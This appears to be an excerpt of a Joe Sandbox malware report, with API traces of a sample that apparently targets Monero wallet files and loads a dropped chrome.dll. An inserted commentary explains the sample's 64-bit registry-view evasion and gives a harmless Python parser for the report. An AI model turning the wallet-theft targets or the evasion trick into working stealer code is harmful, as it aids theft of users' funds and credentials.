                                        • Opcode ID: 5c0b58d7d41a9dfe9f8dd35f42fa6ebb4be9ee0521729a89c10292d86c9a721c
                                        • Instruction ID: 094bff37d3861f50dd3047c10fcf3caa5cd3aa0d90f55d3623597ef060403857
                                        • Opcode Fuzzy Hash: 5c0b58d7d41a9dfe9f8dd35f42fa6ebb4be9ee0521729a89c10292d86c9a721c
                                        • Instruction Fuzzy Hash: 82115EB1A44305EBDB04CF94ED86FBFBBB8FB05B11F104269F615A7281DB7599008BA1
                                        APIs
                                        • StrStrA.SHLWAPI(011CDFC0,00000000,00000000,?,00189F71,00000000,011CDFC0,00000000), ref: 001993FC
                                        • lstrcpyn.KERNEL32(00457580,011CDFC0,011CDFC0,?,00189F71,00000000,011CDFC0), ref: 00199420
                                        • lstrlen.KERNEL32(00000000,?,00189F71,00000000,011CDFC0), ref: 00199437
                                        • wsprintfA.USER32 ref: 00199457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: e6119adc49f3a8cbaf9b72b3284f5db59326118f226687558081ba164e39342d
                                        • Instruction ID: 5b59bc6003b4c084bc48b7cd6fb4a8a51ba9262103c683f26d18891779da37a9
                                        • Opcode Fuzzy Hash: e6119adc49f3a8cbaf9b72b3284f5db59326118f226687558081ba164e39342d
                                        • Instruction Fuzzy Hash: 45011E7550420CFFCB04DFA8D948EAE7B78EB48305F108668F9098B341D735EA44DB94
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                        • RegCloseKey.ADVAPI32(?), ref: 001812FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 33733dbf63e61f3aa42a1bd038a09b27d1f7b321b4f48c95c3af5eec1dd08452
                                        • Instruction ID: 554c3fcabe2125b53626a529ce689a7067cb410af6e0890128283f2ee64c5074
                                        • Opcode Fuzzy Hash: 33733dbf63e61f3aa42a1bd038a09b27d1f7b321b4f48c95c3af5eec1dd08452
                                        • Instruction Fuzzy Hash: 3701CD79A44309BBDB14DFE4EC89FAE777CAB48701F1041A5FA0597281DB70DA008B94
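Two of the entries above (RegOpenKeyExA at 00197FEE and at 001812D7) open a key with samDesired 0x00020119 from a 32-bit process, which is KEY_READ with KEY_WOW64_64KEY set: the sample deliberately reads the 64-bit registry view instead of the WOW64-redirected one, so a detection or emulation that only mirrors the 32-bit view will not reproduce what it sees. The first of the two opens under 0x80000002 (HKEY_LOCAL_MACHINE); in the second the hKey shows as 0x000000FF, which is not a predefined hive value, so it is a handle or an unresolved value. Two caveats on reading these lines: "?" marks a value the sandbox could not resolve, and values printed beside a parameterless API such as GetProcessHeap are simply what sat on the stack at the call, here plausibly the flags and size (0x104, MAX_PATH) already pushed for the RtlAllocateHeap that follows, not parameters of GetProcessHeap. The parser below is an added helper, not part of Joe Sandbox or of the sample: it turns the "APIs" lines of this report into records, keeps the subcall nesting, and decodes the registry arguments. Its sample input is copied from the entries above.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One line of an "APIs" list, e.g.
#   • RegOpenKeyExA.ADVAPI32(80000002,011BC278,00000000,00020119,?), ref: 00197FEE
#   • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?), ref: 0019ACD5
#   • wsprintfA.USER32 ref: 001989E0          (no argument list at all)
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

REG_HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
    (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x00010000, "DELETE"), (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"), (0x00080000, "WRITE_OWNER"),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                 # raw tokens: 8-hex-digit immediates, "?" for unresolved, or string literals
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee that actually issued the call when nested, else None
    notes: list = field(default_factory=list)


def as_int(token):
    """Turn an 8-hex-digit token into an int; '?' and string literals give None."""
    return int(token, 16) if HEX_RE.match(token) else None


def decode_sam(sam):
    """Expand a RegOpenKeyEx samDesired mask into named rights, KEY_READ first if present."""
    names = []
    if sam & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        sam &= ~KEY_READ
    for bit, name in KEY_BITS:
        if sam & bit:
            names.append(name)
            sam &= ~bit
    if sam:
        names.append(f"0x{sam:X}")
    return names


def annotate(call):
    """Attach decoded meaning for the registry open; extend with other APIs as needed."""
    if call.api == "RegOpenKeyExA" and len(call.args) >= 4:
        hive, sam = as_int(call.args[0]), as_int(call.args[3])
        if hive is not None:
            call.notes.append(REG_HIVES.get(hive, f"hKey=0x{hive:X} (not a predefined hive)"))
        if sam is not None:
            call.notes.append("samDesired=" + "|".join(decode_sam(sam)))
            if sam & 0x100:
                call.notes.append("KEY_WOW64_64KEY: 32-bit caller opens the 64-bit view, "
                                  "bypassing WOW64 registry redirection")


def parse_api_lines(text):
    """Parse every API line in a block of report text; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                       int(m["sub"], 16) if m["sub"] else None)
        annotate(call)
        calls.append(call)
    return calls


# Lines copied from the "APIs" entries of this report; the subcall line keeps its indentation.
SAMPLE = r"""• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197FC7
• RtlAllocateHeap.NTDLL(00000000), ref: 00197FCE
• RegOpenKeyExA.ADVAPI32(80000002,011BC278,00000000,00020119,?), ref: 00197FEE
• RegQueryValueExA.ADVAPI32(?,011CD720,00000000,00000000,000000FF,000000FF), ref: 0019800F
• RegCloseKey.ADVAPI32(?), ref: 00198022
  • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
• wsprintfA.USER32 ref: 001989E0
Strings
"""

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(c.args)}) {c.notes}")
```

Feeding a whole report through parse_api_lines gives a flat list that can be grouped by `subcall_of` to recover the helper functions (0019AA50, 0019ACC0 and friends appear under many callers here) and filtered by API to pull out every registry open with its decoded hive and view in one pass.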
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00196903
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 001969C6
                                        • ExitProcess.KERNEL32 ref: 001969F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 64790e7f138a609cb8f6c7b57c5121e30db176b7b72ebe1b4512395984862a4b
                                        • Instruction ID: 93711a0e6fbe9fbe231fe1c34d461371ac9254a089f2acbb9a948395c95ce347
                                        • Opcode Fuzzy Hash: 64790e7f138a609cb8f6c7b57c5121e30db176b7b72ebe1b4512395984862a4b
                                        • Instruction Fuzzy Hash: D93110B1901218ABDB14EB90DD92FDDB778AF64300F804199F20667191DF74AB48CFA9
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0E10,00000000,?), ref: 001989BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001989C6
                                        • wsprintfA.USER32 ref: 001989E0
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 0fc59ac3ba6835626e57ce0e3e70f1fcf6abfddc48c8445777368c56c870dff8
                                        • Instruction ID: c2d97794f764f20bf3a8e31c74ba9c7b2e46ac7b828376c35b14abc01326f0f0
                                        • Opcode Fuzzy Hash: 0fc59ac3ba6835626e57ce0e3e70f1fcf6abfddc48c8445777368c56c870dff8
                                        • Instruction Fuzzy Hash: D72172B1A44304BFDB00DF94ED45FAEBBB8FB49701F108169F605A7281C775A900CBA4
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0018A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: e32b6b46878d94a248071269bae7c1e70f022b485975c76ebda75ef60d9d96d8
                                        • Instruction ID: 086785997470d5dc207a0554814506c2cfe52f5751f8d714a7bd4ef0a1ecd1e1
                                        • Opcode Fuzzy Hash: e32b6b46878d94a248071269bae7c1e70f022b485975c76ebda75ef60d9d96d8
                                        • Instruction Fuzzy Hash: 94F03A7468D304AFE710AB60FD4CBAA36E8E705B42F501536F409972E2C3B4D984CF6A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001996AE,00000000), ref: 00198EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00198EF2
                                        • wsprintfW.USER32 ref: 00198F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 2490ad8e9aa73109e277d04d33719ca4bed09ed41f83d4cb2a334c0c5af9a83f
                                        • Instruction ID: 67b43d080d5595f0b7c9e48a1e2b9b503b918394903869b87d1f346eb3e3402a
                                        • Opcode Fuzzy Hash: 2490ad8e9aa73109e277d04d33719ca4bed09ed41f83d4cb2a334c0c5af9a83f
                                        • Instruction Fuzzy Hash: 6DE0EC75A48309BBDB10DB94ED4AE6D7BBCEB09702F0041B4FD0A97341DA719E109B99
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0018AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 0018ADEC
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ce66f1db52b0a7b17a62723173359775acfa302ffbc9499aa0f6f8eb4f64c35a
                                        • Instruction ID: 78b1551d098685c6ed93ca89af3e73ffd18afb9265e58d644c535d00a3ac234c
                                        • Opcode Fuzzy Hash: ce66f1db52b0a7b17a62723173359775acfa302ffbc9499aa0f6f8eb4f64c35a
                                        • Instruction Fuzzy Hash: 0EE1BF729101189BCF15EBA4DDA2EEE7339BF24301F908569F51776091EF306A4CCBA6
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D581
                                        • lstrlen.KERNEL32(00000000), ref: 0018D798
                                        • lstrlen.KERNEL32(00000000), ref: 0018D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 5e11df67e0d148169b5872352bd040d637654750ad6130290ceb0702c2ea822a
                                        • Instruction ID: a51ae295b412555a2b056f31291666ea5bb6bddf3cb41111fd92274337cc253a
                                        • Opcode Fuzzy Hash: 5e11df67e0d148169b5872352bd040d637654750ad6130290ceb0702c2ea822a
